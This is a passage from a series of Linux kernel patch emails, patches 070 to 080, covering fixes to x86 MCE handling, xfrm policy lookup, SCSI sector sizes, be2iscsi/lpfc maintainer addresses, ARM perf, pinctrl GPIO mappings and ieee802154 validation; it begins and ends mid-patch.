Derek Signed-off-by: Borislav Petkov Cc: Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: Tony Luck Link: http://lkml.kernel.org/r/1431936437-25286-3-git-send-email-bp@alien8.de Signed-off-by: Ingo Molnar --- arch/x86/kernel/cpu/mcheck/mce.c | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/arch/x86/kernel/cpu/mcheck/mce.c b/arch/x86/kernel/cpu/mcheck/mce.c index e535533d5ab8..20190bdac9d5 100644 --- a/arch/x86/kernel/cpu/mcheck/mce.c +++ b/arch/x86/kernel/cpu/mcheck/mce.c @@ -708,6 +708,7 @@ static int mce_no_way_out(struct mce *m, char **msg, unsigned long *validp, struct pt_regs *regs) { int i, ret = 0; + char *tmp; for (i = 0; i < mca_cfg.banks; i++) { m->status = mce_rdmsrl(MSR_IA32_MCx_STATUS(i)); @@ -716,9 +717,11 @@ static int mce_no_way_out(struct mce *m, char **msg, unsigned long *validp, if (quirk_no_way_out) quirk_no_way_out(i, m, regs); } - if (mce_severity(m, mca_cfg.tolerant, msg, true) >= - MCE_PANIC_SEVERITY) + + if (mce_severity(m, mca_cfg.tolerant, &tmp, true) >= MCE_PANIC_SEVERITY) { + *msg = tmp; ret = 1; + } } return ret; } From 8faf491e642011f449d6405be52bedb70964aed6 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Thu, 14 May 2015 11:16:59 +0800 Subject: [PATCH 070/872] xfrm: optimise to search the inexact policy list The policies are organized into list by priority ascent of policy, so it is unnecessary to continue to loop the policy if the priority of current looped police is larger than or equal priority which is from the policy_bydst list. This allows to match policy with ~0U priority in inexact list too. Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 11 ++++++++--- 1 file changed, 8 insertions(+), 3 deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index 3d264e5e7409..18cead7645be 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -1114,6 +1114,9 @@ static struct xfrm_policy *xfrm_policy_lookup_bytype(struct net *net, u8 type, } chain = &net->xfrm.policy_inexact[dir]; hlist_for_each_entry(pol, chain, bydst) { + if ((pol->priority >= priority) && ret) + break; + err = xfrm_policy_match(pol, fl, type, family, dir); if (err) { if (err == -ESRCH) @@ -1122,7 +1125,7 @@ static struct xfrm_policy *xfrm_policy_lookup_bytype(struct net *net, u8 type, ret = ERR_PTR(err); goto fail; } - } else if (pol->priority < priority) { + } else { ret = pol; break; } @@ -3203,9 +3206,11 @@ static struct xfrm_policy *xfrm_migrate_policy_find(const struct xfrm_selector * } chain = &net->xfrm.policy_inexact[dir]; hlist_for_each_entry(pol, chain, bydst) { + if ((pol->priority >= priority) && ret) + break; + if (xfrm_migrate_selector_match(sel, &pol->selector) && - pol->type == type && - pol->priority < priority) { + pol->type == type) { ret = pol; break; } From ea8e080b604e2c8221af778221d83a59b6529c5b Mon Sep 17 00:00:00 2001 From: Aravind Gopalakrishnan Date: Mon, 18 May 2015 10:07:16 +0200 Subject: [PATCH 071/872] x86/Documentation: Update the contact email for L3 cache index disable functionality The mailing list discuss@x86-64.org is now defunct. Use the lkml in its place. Signed-off-by: Aravind Gopalakrishnan Signed-off-by: Borislav Petkov Cc: Greg KH Cc: H. Peter Anvin Cc: Linus Torvalds Cc: Peter Zijlstra Cc: Thomas Gleixner Cc: linux-api@vger.kernel.org Cc: sboyd@codeaurora.org Cc: sudeep.holla@arm.com Link: http://lkml.kernel.org/r/1431125098-9470-1-git-send-email-Aravind.Gopalakrishnan@amd.com Link: http://lkml.kernel.org/r/1431936437-25286-2-git-send-email-bp@alien8.de [ Changed the contact email to lkml. ] Signed-off-by: Ingo Molnar --- Documentation/ABI/testing/sysfs-devices-system-cpu | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Documentation/ABI/testing/sysfs-devices-system-cpu b/Documentation/ABI/testing/sysfs-devices-system-cpu index 99983e67c13c..da95513571ea 100644 --- a/Documentation/ABI/testing/sysfs-devices-system-cpu +++ b/Documentation/ABI/testing/sysfs-devices-system-cpu @@ -162,7 +162,7 @@ Description: Discover CPUs in the same CPU frequency coordination domain What: /sys/devices/system/cpu/cpu*/cache/index3/cache_disable_{0,1} Date: August 2008 KernelVersion: 2.6.27 -Contact: discuss@x86-64.org +Contact: Linux kernel mailing list Description: Disable L3 cache indices These files exist in every CPU's cache/index3 directory. Each From 74856fbf441929918c49ff262ace9835048e4e6a Mon Sep 17 00:00:00 2001 From: Mark Hounschell Date: Wed, 13 May 2015 10:49:09 +0200 Subject: [PATCH 072/872] sd: Disable support for 256 byte/sector disks 256 bytes per sector support has been broken since 2.6.X, and no-one stepped up to fix this. So disable support for it. Signed-off-by: Mark Hounschell Signed-off-by: Hannes Reinecke Cc: stable@vger.kernel.org Signed-off-by: James Bottomley --- drivers/scsi/sd.c | 19 +++++-------------- 1 file changed, 5 insertions(+), 14 deletions(-) diff --git a/drivers/scsi/sd.c b/drivers/scsi/sd.c index 79beebf53302..7f9d65fe4fd9 100644 --- a/drivers/scsi/sd.c +++ b/drivers/scsi/sd.c @@ -1600,6 +1600,7 @@ static unsigned int sd_completed_bytes(struct scsi_cmnd *scmd) { u64 start_lba = blk_rq_pos(scmd->request); u64 end_lba = blk_rq_pos(scmd->request) + (scsi_bufflen(scmd) / 512); + u64 factor = scmd->device->sector_size / 512; u64 bad_lba; int info_valid; /* @@ -1621,16 +1622,9 @@ static unsigned int sd_completed_bytes(struct scsi_cmnd *scmd) if (scsi_bufflen(scmd) <= scmd->device->sector_size) return 0; - if (scmd->device->sector_size < 512) { - /* only legitimate sector_size here is 256 */ - start_lba <<= 1; - end_lba <<= 1; - } else { - /* be careful ... don't want any overflows */ - unsigned int factor = scmd->device->sector_size / 512; - do_div(start_lba, factor); - do_div(end_lba, factor); - } + /* be careful ... don't want any overflows */ + do_div(start_lba, factor); + do_div(end_lba, factor); /* The bad lba was reported incorrectly, we have no idea where * the error is. @@ -2188,8 +2182,7 @@ sd_read_capacity(struct scsi_disk *sdkp, unsigned char *buffer) if (sector_size != 512 && sector_size != 1024 && sector_size != 2048 && - sector_size != 4096 && - sector_size != 256) { + sector_size != 4096) { sd_printk(KERN_NOTICE, sdkp, "Unsupported sector size %d.\n", sector_size); /* @@ -2244,8 +2237,6 @@ sd_read_capacity(struct scsi_disk *sdkp, unsigned char *buffer) sdkp->capacity <<= 2; else if (sector_size == 1024) sdkp->capacity <<= 1; - else if (sector_size == 256) - sdkp->capacity >>= 1; blk_queue_physical_block_size(sdp->request_queue, sdkp->physical_block_size); From 4627de932d5528ede89ee3ea84ef6339a906e58d Mon Sep 17 00:00:00 2001 From: Minh Tran Date: Thu, 14 May 2015 23:16:17 -0700 Subject: [PATCH 073/872] MAINTAINERS, be2iscsi: change email domain be2iscsi change of ownership from Emulex to Avago Technologies recently. We like to get the following updates in: changed "Emulex" to "Avago Technologies", changed email addresses from "emulex.com" to "avagotech.com", updated MAINTAINER list for be2iscsi driver. Signed-off-by: Minh Tran Signed-off-by: Jayamohan Kallickal Signed-off-by: James Bottomley --- MAINTAINERS | 6 ++++-- drivers/scsi/be2iscsi/be.h | 6 +++--- drivers/scsi/be2iscsi/be_cmds.c | 6 +++--- drivers/scsi/be2iscsi/be_cmds.h | 6 +++--- drivers/scsi/be2iscsi/be_iscsi.c | 8 ++++---- drivers/scsi/be2iscsi/be_iscsi.h | 8 ++++---- drivers/scsi/be2iscsi/be_main.c | 12 ++++++------ drivers/scsi/be2iscsi/be_main.h | 10 +++++----- drivers/scsi/be2iscsi/be_mgmt.c | 8 ++++---- drivers/scsi/be2iscsi/be_mgmt.h | 8 ++++---- 10 files changed, 40 insertions(+), 38 deletions(-) diff --git a/MAINTAINERS b/MAINTAINERS index 2e5bbc0d68b2..2c6926d2776a 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -8794,9 +8794,11 @@ F: drivers/misc/phantom.c F: include/uapi/linux/phantom.h SERVER ENGINES 10Gbps iSCSI - BladeEngine 2 DRIVER -M: Jayamohan Kallickal +M: Jayamohan Kallickal +M: Minh Tran +M: John Soni Jose L: linux-scsi@vger.kernel.org -W: http://www.emulex.com +W: http://www.avagotech.com S: Supported F: drivers/scsi/be2iscsi/ diff --git a/drivers/scsi/be2iscsi/be.h b/drivers/scsi/be2iscsi/be.h index 81e83a65a193..32070099c333 100644 --- a/drivers/scsi/be2iscsi/be.h +++ b/drivers/scsi/be2iscsi/be.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -8,9 +8,9 @@ * Public License is included in this distribution in the file called COPYING. * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_cmds.c b/drivers/scsi/be2iscsi/be_cmds.c index 1028760b8a22..447cf7ce606e 100644 --- a/drivers/scsi/be2iscsi/be_cmds.c +++ b/drivers/scsi/be2iscsi/be_cmds.c @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -8,9 +8,9 @@ * Public License is included in this distribution in the file called COPYING. * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_cmds.h b/drivers/scsi/be2iscsi/be_cmds.h index 98897434bcb4..f11d325fe696 100644 --- a/drivers/scsi/be2iscsi/be_cmds.h +++ b/drivers/scsi/be2iscsi/be_cmds.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -8,9 +8,9 @@ * Public License is included in this distribution in the file called COPYING. * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_iscsi.c b/drivers/scsi/be2iscsi/be_iscsi.c index b7391a3f9f0b..2f0700796842 100644 --- a/drivers/scsi/be2iscsi/be_iscsi.c +++ b/drivers/scsi/be2iscsi/be_iscsi.c @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_iscsi.h b/drivers/scsi/be2iscsi/be_iscsi.h index e0b3b2d1f27a..0c84e1c0763a 100644 --- a/drivers/scsi/be2iscsi/be_iscsi.h +++ b/drivers/scsi/be2iscsi/be_iscsi.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_main.c b/drivers/scsi/be2iscsi/be_main.c index 923a2b5a2439..1f74760ce86c 100644 --- a/drivers/scsi/be2iscsi/be_main.c +++ b/drivers/scsi/be2iscsi/be_main.c @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ @@ -50,7 +50,7 @@ static unsigned int enable_msix = 1; MODULE_DESCRIPTION(DRV_DESC " " BUILD_STR); MODULE_VERSION(BUILD_STR); -MODULE_AUTHOR("Emulex Corporation"); +MODULE_AUTHOR("Avago Technologies"); MODULE_LICENSE("GPL"); module_param(be_iopoll_budget, int, 0); module_param(enable_msix, int, 0); @@ -552,7 +552,7 @@ MODULE_DEVICE_TABLE(pci, beiscsi_pci_id_table); static struct scsi_host_template beiscsi_sht = { .module = THIS_MODULE, - .name = "Emulex 10Gbe open-iscsi Initiator Driver", + .name = "Avago Technologies 10Gbe open-iscsi Initiator Driver", .proc_name = DRV_NAME, .queuecommand = iscsi_queuecommand, .change_queue_depth = scsi_change_queue_depth, diff --git a/drivers/scsi/be2iscsi/be_main.h b/drivers/scsi/be2iscsi/be_main.h index 7ee0ffc38514..e70ea26bbc2b 100644 --- a/drivers/scsi/be2iscsi/be_main.h +++ b/drivers/scsi/be2iscsi/be_main.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ @@ -37,7 +37,7 @@ #define DRV_NAME "be2iscsi" #define BUILD_STR "10.4.114.0" -#define BE_NAME "Emulex OneConnect" \ +#define BE_NAME "Avago Technologies OneConnect" \ "Open-iSCSI Driver version" BUILD_STR #define DRV_DESC BE_NAME " " "Driver" diff --git a/drivers/scsi/be2iscsi/be_mgmt.c b/drivers/scsi/be2iscsi/be_mgmt.c index 681d4e8f003a..c2c4d6975fb7 100644 --- a/drivers/scsi/be2iscsi/be_mgmt.c +++ b/drivers/scsi/be2iscsi/be_mgmt.c @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ diff --git a/drivers/scsi/be2iscsi/be_mgmt.h b/drivers/scsi/be2iscsi/be_mgmt.h index bd81446936fc..9356b9a86b66 100644 --- a/drivers/scsi/be2iscsi/be_mgmt.h +++ b/drivers/scsi/be2iscsi/be_mgmt.h @@ -1,5 +1,5 @@ /** - * Copyright (C) 2005 - 2014 Emulex + * Copyright (C) 2005 - 2015 Avago Technologies * All rights reserved. * * This program is free software; you can redistribute it and/or @@ -7,12 +7,12 @@ * as published by the Free Software Foundation. The full GNU General * Public License is included in this distribution in the file called COPYING. * - * Written by: Jayamohan Kallickal (jayamohan.kallickal@emulex.com) + * Written by: Jayamohan Kallickal (jayamohan.kallickal@avagotech.com) * * Contact Information: - * linux-drivers@emulex.com + * linux-drivers@avagotech.com * - * Emulex + * Avago Technologies * 3333 Susan Street * Costa Mesa, CA 92626 */ From 32505876c0947a4cecc409dfbef1fc58ced6138d Mon Sep 17 00:00:00 2001 From: James Smart Date: Fri, 15 May 2015 13:10:58 -0400 Subject: [PATCH 074/872] MAINTAINERS: Revise lpfc maintainers for Avago Technologies ownership of Emulex The old email addresses will go away very soon. Revising with new addresses. Signed-off-by: Dick Kennedy Signed-off-by: James Smart Signed-off-by: James Bottomley --- MAINTAINERS | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/MAINTAINERS b/MAINTAINERS index 2c6926d2776a..d42115a6de2b 100644 --- a/MAINTAINERS +++ b/MAINTAINERS @@ -3803,10 +3803,11 @@ M: David Woodhouse L: linux-embedded@vger.kernel.org S: Maintained -EMULEX LPFC FC SCSI DRIVER -M: James Smart +EMULEX/AVAGO LPFC FC/FCOE SCSI DRIVER +M: James Smart +M: Dick Kennedy L: linux-scsi@vger.kernel.org -W: http://sourceforge.net/projects/lpfcxxxx +W: http://www.avagotech.com S: Supported F: drivers/scsi/lpfc/ From 8d2812849acbc13c07bdad8a0a55a342ec1ce3a4 Mon Sep 17 00:00:00 2001 From: Will Deacon Date: Thu, 14 May 2015 18:07:44 +0100 Subject: [PATCH 075/872] ARM: 8357/1: perf: fix memory leak when probing PMU PPIs Commit 338d9dd3e2ae ("ARM: 8351/1: perf: don't warn about missing interrupt-affinity property for PPIs") added a check for PPIs so that we avoid parsing the interrupt-affinity property for these naturally affine interrupts. Unfortunately, this check can trigger an early (successful) return and we will leak the irqs array. This patch fixes the issue by reordering the code so that the check is performed before any independent allocation. Reported-by: David Binderman Signed-off-by: Will Deacon Signed-off-by: Russell King --- arch/arm/kernel/perf_event_cpu.c | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/arch/arm/kernel/perf_event_cpu.c b/arch/arm/kernel/perf_event_cpu.c index 213919ba326f..3b8c2833c537 100644 --- a/arch/arm/kernel/perf_event_cpu.c +++ b/arch/arm/kernel/perf_event_cpu.c @@ -304,16 +304,17 @@ static int probe_current_pmu(struct arm_pmu *pmu) static int of_pmu_irq_cfg(struct platform_device *pdev) { int i, irq; - int *irqs = kcalloc(pdev->num_resources, sizeof(*irqs), GFP_KERNEL); - - if (!irqs) - return -ENOMEM; + int *irqs; /* Don't bother with PPIs; they're already affine */ irq = platform_get_irq(pdev, 0); if (irq >= 0 && irq_is_percpu(irq)) return 0; + irqs = kcalloc(pdev->num_resources, sizeof(*irqs), GFP_KERNEL); + if (!irqs) + return -ENOMEM; + for (i = 0; i < pdev->num_resources; ++i) { struct device_node *dn; int cpu; From 75e9143927a893aebad18b79e1bbeff4892c0d35 Mon Sep 17 00:00:00 2001 From: Ray Jui Date: Wed, 13 May 2015 17:06:23 -0700 Subject: [PATCH 076/872] pinctrl: cygnus: fixed incorrect GPIO-pin mapping This patch fixes an incorrect GPIO-to-pin mapping in the Cygnus GPIO driver Signed-off-by: Ray Jui Signed-off-by: Linus Walleij --- drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c b/drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c index 4ad5c1a996e3..e406e3d8c1c7 100644 --- a/drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c +++ b/drivers/pinctrl/bcm/pinctrl-cygnus-gpio.c @@ -643,7 +643,9 @@ static const struct cygnus_gpio_pin_range cygnus_gpio_pintable[] = { CYGNUS_PINRANGE(87, 104, 12), CYGNUS_PINRANGE(99, 102, 2), CYGNUS_PINRANGE(101, 90, 4), - CYGNUS_PINRANGE(105, 116, 10), + CYGNUS_PINRANGE(105, 116, 6), + CYGNUS_PINRANGE(111, 100, 2), + CYGNUS_PINRANGE(113, 122, 4), CYGNUS_PINRANGE(123, 11, 1), CYGNUS_PINRANGE(124, 38, 4), CYGNUS_PINRANGE(128, 43, 1), From 984cffdeaeb7ea5a21f49a89f638d84d62d08992 Mon Sep 17 00:00:00 2001 From: Carlo Caione Date: Sun, 17 May 2015 17:57:38 +0200 Subject: [PATCH 077/872] pinctrl: Fix gpio/pin mapping for Meson8b The num_pins field in the struct meson_domain_data must include also the missing pins in the Meson8b SoC, otherwise the GPIO <-> pin mapping is broken on this platform. Avoid also the dinamic allocation for GPIOs. Signed-off-by: Carlo Caione Signed-off-by: Linus Walleij --- drivers/pinctrl/meson/pinctrl-meson.c | 2 +- drivers/pinctrl/meson/pinctrl-meson8b.c | 4 ++-- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/drivers/pinctrl/meson/pinctrl-meson.c b/drivers/pinctrl/meson/pinctrl-meson.c index edcd140e0899..a70a5fe79d44 100644 --- a/drivers/pinctrl/meson/pinctrl-meson.c +++ b/drivers/pinctrl/meson/pinctrl-meson.c @@ -569,7 +569,7 @@ static int meson_gpiolib_register(struct meson_pinctrl *pc) domain->chip.direction_output = meson_gpio_direction_output; domain->chip.get = meson_gpio_get; domain->chip.set = meson_gpio_set; - domain->chip.base = -1; + domain->chip.base = domain->data->pin_base; domain->chip.ngpio = domain->data->num_pins; domain->chip.can_sleep = false; domain->chip.of_node = domain->of_node; diff --git a/drivers/pinctrl/meson/pinctrl-meson8b.c b/drivers/pinctrl/meson/pinctrl-meson8b.c index 2f7ea6229880..9677807db364 100644 --- a/drivers/pinctrl/meson/pinctrl-meson8b.c +++ b/drivers/pinctrl/meson/pinctrl-meson8b.c @@ -876,13 +876,13 @@ static struct meson_domain_data meson8b_domain_data[] = { .banks = meson8b_banks, .num_banks = ARRAY_SIZE(meson8b_banks), .pin_base = 0, - .num_pins = 83, + .num_pins = 130, }, { .name = "ao-bank", .banks = meson8b_ao_banks, .num_banks = ARRAY_SIZE(meson8b_ao_banks), - .pin_base = 83, + .pin_base = 130, .num_pins = 16, }, }; From 0cf0879acdbeff695963d78940b89497803ae55c Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:37 +0200 Subject: [PATCH 078/872] nl802154: cleanup invalid argument handling This patch cleanups the -EINVAL cases by combining them in one condition. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/nl802154.c | 12 ++++-------- 1 file changed, 4 insertions(+), 8 deletions(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index f3c12f6a4a39..c01f4bbe7c7c 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -668,10 +668,8 @@ static int nl802154_set_pan_id(struct sk_buff *skb, struct genl_info *info) return -EBUSY; /* don't change address fields on monitor */ - if (wpan_dev->iftype == NL802154_IFTYPE_MONITOR) - return -EINVAL; - - if (!info->attrs[NL802154_ATTR_PAN_ID]) + if (wpan_dev->iftype == NL802154_IFTYPE_MONITOR || + !info->attrs[NL802154_ATTR_PAN_ID]) return -EINVAL; pan_id = nla_get_le16(info->attrs[NL802154_ATTR_PAN_ID]); @@ -691,10 +689,8 @@ static int nl802154_set_short_addr(struct sk_buff *skb, struct genl_info *info) return -EBUSY; /* don't change address fields on monitor */ - if (wpan_dev->iftype == NL802154_IFTYPE_MONITOR) - return -EINVAL; - - if (!info->attrs[NL802154_ATTR_SHORT_ADDR]) + if (wpan_dev->iftype == NL802154_IFTYPE_MONITOR || + !info->attrs[NL802154_ATTR_SHORT_ADDR]) return -EINVAL; short_addr = nla_get_le16(info->attrs[NL802154_ATTR_SHORT_ADDR]); From 673692faf3fb42ec73ef7210238b5869d6e2873d Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:38 +0200 Subject: [PATCH 079/872] ieee802154: move validation check out of softmac This patch moves the value validation out of softmac layer. We need to be sure now that this value is accepted by the transceiver/mac802154 or "possible" hardmac drivers before calling rdev-ops. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- net/ieee802154/nl802154.c | 28 +++++++++++++++++++++++++++- net/mac802154/cfg.c | 29 ----------------------------- 2 files changed, 27 insertions(+), 30 deletions(-) diff --git a/net/ieee802154/nl802154.c b/net/ieee802154/nl802154.c index c01f4bbe7c7c..d750d9778ba7 100644 --- a/net/ieee802154/nl802154.c +++ b/net/ieee802154/nl802154.c @@ -625,7 +625,8 @@ static int nl802154_set_channel(struct sk_buff *skb, struct genl_info *info) channel = nla_get_u8(info->attrs[NL802154_ATTR_CHANNEL]); /* check 802.15.4 constraints */ - if (page > IEEE802154_MAX_PAGE || channel > IEEE802154_MAX_CHANNEL) + if (page > IEEE802154_MAX_PAGE || channel > IEEE802154_MAX_CHANNEL || + !(rdev->wpan_phy.channels_supported[page] & BIT(channel))) return -EINVAL; return rdev_set_channel(rdev, page, channel); @@ -674,6 +675,16 @@ static int nl802154_set_pan_id(struct sk_buff *skb, struct genl_info *info) pan_id = nla_get_le16(info->attrs[NL802154_ATTR_PAN_ID]); + /* TODO + * I am not sure about to check here on broadcast pan_id. + * Broadcast is a valid setting, comment from 802.15.4: + * If this value is 0xffff, the device is not associated. + * + * This could useful to simple deassociate an device. + */ + if (pan_id == cpu_to_le16(IEEE802154_PAN_ID_BROADCAST)) + return -EINVAL; + return rdev_set_pan_id(rdev, wpan_dev, pan_id); } @@ -695,6 +706,21 @@ static int nl802154_set_short_addr(struct sk_buff *skb, struct genl_info *info) short_addr = nla_get_le16(info->attrs[NL802154_ATTR_SHORT_ADDR]); + /* TODO + * I am not sure about to check here on broadcast short_addr. + * Broadcast is a valid setting, comment from 802.15.4: + * A value of 0xfffe indicates that the device has + * associated but has not been allocated an address. A + * value of 0xffff indicates that the device does not + * have a short address. + * + * I think we should allow to set these settings but + * don't allow to allow socket communication with it. + */ + if (short_addr == cpu_to_le16(IEEE802154_ADDR_SHORT_UNSPEC) || + short_addr == cpu_to_le16(IEEE802154_ADDR_SHORT_BROADCAST)) + return -EINVAL; + return rdev_set_short_addr(rdev, wpan_dev, short_addr); } diff --git a/net/mac802154/cfg.c b/net/mac802154/cfg.c index 70be9c799f8a..c63601582c71 100644 --- a/net/mac802154/cfg.c +++ b/net/mac802154/cfg.c @@ -73,10 +73,6 @@ ieee802154_set_channel(struct wpan_phy *wpan_phy, u8 page, u8 channel) ASSERT_RTNL(); - /* check if phy support this setting */ - if (!(wpan_phy->channels_supported[page] & BIT(channel))) - return -EINVAL; - ret = drv_set_channel(local, page, channel); if (!ret) { wpan_phy->current_page = page; @@ -112,16 +108,6 @@ ieee802154_set_pan_id(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, { ASSERT_RTNL(); - /* TODO - * I am not sure about to check here on broadcast pan_id. - * Broadcast is a valid setting, comment from 802.15.4: - * If this value is 0xffff, the device is not associated. - * - * This could useful to simple deassociate an device. - */ - if (pan_id == cpu_to_le16(IEEE802154_PAN_ID_BROADCAST)) - return -EINVAL; - wpan_dev->pan_id = pan_id; return 0; } @@ -149,21 +135,6 @@ ieee802154_set_short_addr(struct wpan_phy *wpan_phy, struct wpan_dev *wpan_dev, { ASSERT_RTNL(); - /* TODO - * I am not sure about to check here on broadcast short_addr. - * Broadcast is a valid setting, comment from 802.15.4: - * A value of 0xfffe indicates that the device has - * associated but has not been allocated an address. A - * value of 0xffff indicates that the device does not - * have a short address. - * - * I think we should allow to set these settings but - * don't allow to allow socket communication with it. - */ - if (short_addr == cpu_to_le16(IEEE802154_ADDR_SHORT_UNSPEC) || - short_addr == cpu_to_le16(IEEE802154_ADDR_SHORT_BROADCAST)) - return -EINVAL; - wpan_dev->short_addr = short_addr; return 0; } From 1a19cb680be0d4b06ce9a9d6516b8f45f544d3e8 Mon Sep 17 00:00:00 2001 From: Alexander Aring Date: Sun, 17 May 2015 21:44:39 +0200 Subject: [PATCH 080/872] ieee802154: change transmit power to s32 This patch change the transmit power from s8 to s32. This prepares to store a mbm value instead dbm inside the transmit power variable. The old interface keep the a s8 dbm value, which should be backward compatibility when assign s8 to s32. Signed-off-by: Alexander Aring Signed-off-by: Marcel Holtmann --- drivers/net/ieee802154/at86rf230.c | 2 +- include/net/cfg802154.h | 2 +- include/net/mac802154.h | 2 +- net/ieee802154/nl802154.c | 6 +++--- net/mac802154/driver-ops.h | 2 +- 5 files changed, 7 insertions(+), 7 deletions(-) diff --git a/drivers/net/ieee802154/at86rf230.c b/drivers/net/ieee802154/at86rf230.c index 67d00fbc2e0e..02b6bb72304d 100644 --- a/drivers/net/ieee802154/at86rf230.c +++ b/drivers/net/ieee802154/at86rf230.c @@ -1194,7 +1194,7 @@ at86rf230_set_hw_addr_filt(struct ieee802154_hw *hw, } static int -at86rf230_set_txpower(struct ieee802154_hw *hw, s8 db) +at86rf230_set_txpower(struct ieee802154_hw *hw, s32 db) { struct at86rf230_local *lp = hw->priv; diff --git a/include/net/cfg802154.h b/include/net/cfg802154.h index 6ea16c84293b..47804cddb46f 100644 --- a/include/net/cfg802154.h +++ b/include/net/cfg802154.h @@ -85,7 +85,7 @@ struct wpan_phy { u8 current_channel; u8 current_page; u32 channels_supported[IEEE802154_MAX_PAGE + 1]; - s8 transmit_power; + s32 transmit_power; struct wpan_phy_cca cca; __le64 perm_extended_addr; diff --git a/include/net/mac802154.h b/include/net/mac802154.h index 7df28a4c23f9..400e4e85c53f 100644 --- a/include/net/mac802154.h +++ b/include/net/mac802154.h @@ -213,7 +213,7 @@ struct ieee802154_ops { 